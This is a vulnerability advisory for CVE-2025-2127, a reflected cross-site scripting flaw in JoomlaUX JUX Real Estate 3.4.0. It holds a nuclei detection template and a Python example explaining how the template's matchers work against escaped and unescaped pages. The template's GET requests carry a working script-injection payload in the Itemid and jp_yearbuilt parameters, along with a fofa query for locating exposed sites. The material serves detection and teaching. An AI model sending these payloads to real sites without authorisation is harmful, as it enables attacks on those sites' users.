A vulnerability was found in JoomlaUX JUX Real Estate 3.4.0 on Joomla. It has been classified as problematic. Affected is an unknown function of the file /extensions/realestate/index.php/properties/list/list-with-sidebar/realties. The manipulation of the argument Itemid/jp_yearbuilt leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
PoC code [publicly disclosed]
id: CVE-2025-2127

info:
  name: JoomlaUX JUX Real Estate 3.4.0 - Reflected XSS
  author: 3th1c_yuk1
  severity: medium
  description: |
    A vulnerability was found in JoomlaUX JUX Real Estate 3.4.0 on Joomla. It has been classified as problematic. Affected is an unknown function of the file /extensions/realestate/index.php/properties/list/list-with-sidebar/realties. The manipulation of the argument Itemid/jp_yearbuilt leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2127
    - https://vuldb.com/?id.299040
    - https://vuldb.com/?ctiid.299040
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2025-2127
    cwe-id: CWE-79
    epss-score: 0.00415
    epss-percentile: 0.60921
    cpe: cpe:2.3:a:joomlaux:jux_real_estate:3.4.0:*:*:*:*:joomla:*:*
  metadata:
    vendor: joomlaux
    product: jux_real_estate
    framework: joomla
    fofa-query: body="joomlaux"
    verified: true
    max-request: 2
  tags: cve,cve2025,joomlaux,joomla

http:
  - method: GET
    path:
      - "{{BaseURL}}/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=6wdv%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ewz8nu&title=&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=&button=Search"
      - "{{BaseURL}}/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=mzbpj%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3eflmo8&button=Search"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - 'joomlaux'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"
# digest: 4a0a00473045022036b1db68810d9da6527680affff1f49c7b8dea08720a25eb8dfac62adc5bed80022100a6328a65d5c5136a1b113d3a412f981c1fa6b80f0e0de5a495be807c0244c519:922c64590222798bb761d5b6d8e72950
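The template above only reports a finding when both matchers pass: the response body must contain the reflected probe string and the vendor marker, and the Content-Type must be text/html. The following Python is an added example, not code from the advisory, the template author or the nuclei project. It percent-decodes the second probe URL from the template, reflects the jp_yearbuilt value through two hypothetical page renderers (one verbatim, one HTML-escaped; the real JUX Real Estate code is not on the page), and then evaluates the template's matcher logic against the constructed responses, so a defender can see why an escaped reflection or a non-HTML response does not trigger the template.

```python
"""Added example (not from the advisory or the nuclei project): decode the
CVE-2025-2127 probe URL and evaluate the template's matcher logic against
constructed HTTP responses. Both renderers below are hypothetical."""
import html
from urllib.parse import parse_qs, urlsplit

# Strings taken verbatim from the template's matchers section.
PAYLOAD_MARKER = "<script>alert(document.domain)</script>"
VENDOR_MARKER = "joomlaux"

# Second probe path from the template; {{BaseURL}} replaced with a placeholder host.
PROBE_URL = (
    "http://example.invalid/extensions/realestate/index.php/properties/list/"
    "list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148"
    "&jp_yearbuilt=mzbpj%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3eflmo8"
    "&button=Search"
)


def decode_query(url):
    """Return the probe's query parameters, percent-decoded (first value of each)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in qs.items()}


def render_unescaped(params):
    """Hypothetical vulnerable renderer: the search field is echoed into HTML verbatim,
    so the closing quote and angle brackets in the probe break out of the attribute."""
    value = params.get("jp_yearbuilt", "")
    return ('<html><body class="joomlaux">'
            f'<input name="jp_yearbuilt" value="{value}">'
            '</body></html>')


def render_escaped(params):
    """Hypothetical fixed renderer: HTML-encode the reflected value. quote=True also
    encodes the double quote, which is what closes the attribute in the probe."""
    value = html.escape(params.get("jp_yearbuilt", ""), quote=True)
    return ('<html><body class="joomlaux">'
            f'<input name="jp_yearbuilt" value="{value}">'
            '</body></html>')


def body_matcher(body):
    """First matcher: both words must appear in the body (condition: and)."""
    return PAYLOAD_MARKER in body and VENDOR_MARKER in body


def content_type_matcher(content_type):
    """Second matcher: the content_type part must contain text/html."""
    return "text/html" in content_type


def template_matches(body, content_type):
    """matchers-condition: and -> every matcher must pass for a finding."""
    return body_matcher(body) and content_type_matcher(content_type)


def first_match(responses):
    """stop-at-first-match: index of the first (body, content_type) pair that
    satisfies the template, or None when nothing matches."""
    for i, (body, content_type) in enumerate(responses):
        if template_matches(body, content_type):
            return i
    return None


if __name__ == "__main__":
    params = decode_query(PROBE_URL)
    print(params["jp_yearbuilt"])
    vuln_page = render_unescaped(params)
    fixed_page = render_escaped(params)
    print("unescaped reflection, HTML:", template_matches(vuln_page, "text/html; charset=utf-8"))
    print("escaped reflection, HTML:  ", template_matches(fixed_page, "text/html; charset=utf-8"))
    # The same raw reflection in a JSON body fails the content_type matcher.
    print("unescaped reflection, JSON:", template_matches(vuln_page, "application/json"))
```

Running the script shows the decoded probe value (`mzbpj"><script>alert(document.domain)</script>flmo8`), a match for the verbatim renderer, and no match for either the escaped renderer or the JSON response. The last case is worth remembering when triaging: a reflection that the template ignores because of its content type can still be a bug in an endpoint that later serves the value as HTML, so treat the template as a positive confirmation, not as proof of absence.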